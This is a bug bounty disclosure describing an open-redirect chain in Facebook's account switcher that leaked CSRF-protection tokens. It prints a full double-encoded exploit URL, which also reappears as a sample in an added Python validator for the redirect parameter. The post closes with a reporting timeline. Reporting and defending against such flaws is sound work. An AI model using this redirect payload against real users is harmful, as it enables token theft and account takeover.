Stealing Side-Channel Attack Tokens in Facebook Account Switcher

After receiving an email from Facebook that somebody requested to join my group, I decided to open the link in a different account to see the results. I was brought to the “account switcher” page that looks like this.

Upon hitting continue it would normally log you out and prompt you to log in on the new account. But in the URL for the account switcher there was a next parameter controlling where to go after hitting continue. On top of being able to control where the request goes, it also appends a fb_dtsg_ag token (the token used to prevent side-channel attacks on Facebook).

The next task was to somehow find a way to steal the tokens once the user hits continue. My main goal was to get the token to redirect to apps.facebook.com, where I could harvest the token using an embedded iframe to pull the data from the URL. The only problem was the next parameter didn’t support subdomains, so it could only redirect to https://www.facebook.com/. Luckily enough, Facebook has an endpoint https://www.facebook.com/n/? where you can put any Facebook domain after the ? and it will redirect. After a little bit of URL encoding the final URL looked like this:

https://www.facebook.com/notif_account_switching/&next=https%3A%2F%2Fwww.facebook.com%2Fn%2F%3Fhttps%253A%252F%252Fapps.facebook.com%252FAPPTOSTEALTOKENS%252523

I clicked continue, and then checked my website's log file to see this

Success!
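
A server-side check on the next parameter that would refuse to append a token to the redirect chain described above, as an added example (not code from this post or from Facebook). The allowed host and the /n/ redirector come from the post; the function names, the decode bound and the constructed sample URLs are assumptions.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_HOST = "www.facebook.com"  # host the post says `next` was limited to
REDIRECTOR_PATHS = ("/n/",)        # redirector endpoint named in the post
MAX_DECODE_ROUNDS = 5              # assumption: bound on nested encoding layers

# `next` value from the post's URL, still percent-encoded as it appears there
RAW_NEXT = ("https%3A%2F%2Fwww.facebook.com%2Fn%2F%3Fhttps%253A%252F%252F"
            "apps.facebook.com%252FAPPTOSTEALTOKENS%252523")


def decode_layers(value):
    """Return value plus each further percent-decoding until it stops changing."""
    layers = [value]
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers


def check_next(next_url):
    """Return (ok, reason); a token may be appended only when ok is True."""
    parts = urlsplit(next_url)
    if parts.scheme != "https" or parts.hostname != ALLOWED_HOST:
        return False, "not on the allowed host"
    if any(parts.path.startswith(p) for p in REDIRECTOR_PATHS):
        return False, "points at a redirector endpoint"
    # A URL hidden in the query or fragment can carry the token to another host
    layers = decode_layers(parts.query + "#" + parts.fragment)
    if len(layers) > MAX_DECODE_ROUNDS or any("://" in l for l in layers):
        return False, "embeds another URL or is encoded too deeply"
    return True, "ok"


if __name__ == "__main__":
    samples = [
        unquote(RAW_NEXT),  # what the server sees after one decoding pass
        "https://www.facebook.com/page?u=https%253A%252F%252Fapps.facebook.com%252Fx",  # constructed
        "https://www.facebook.com/groups/123/requests/",  # constructed, benign
    ]
    for s in samples:
        print(check_next(s), s)
```

The check looks at every decoding layer because the second hop in the post's URL only becomes visible after the value has been percent-decoded more than once.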

Timeline

Submitted: December 7th, 2018

Triaged: December 10th, 2018

Team Asks for Verification on Fix: January 3rd, 2019

Bounty Awarded ($1000): January 4th, 2019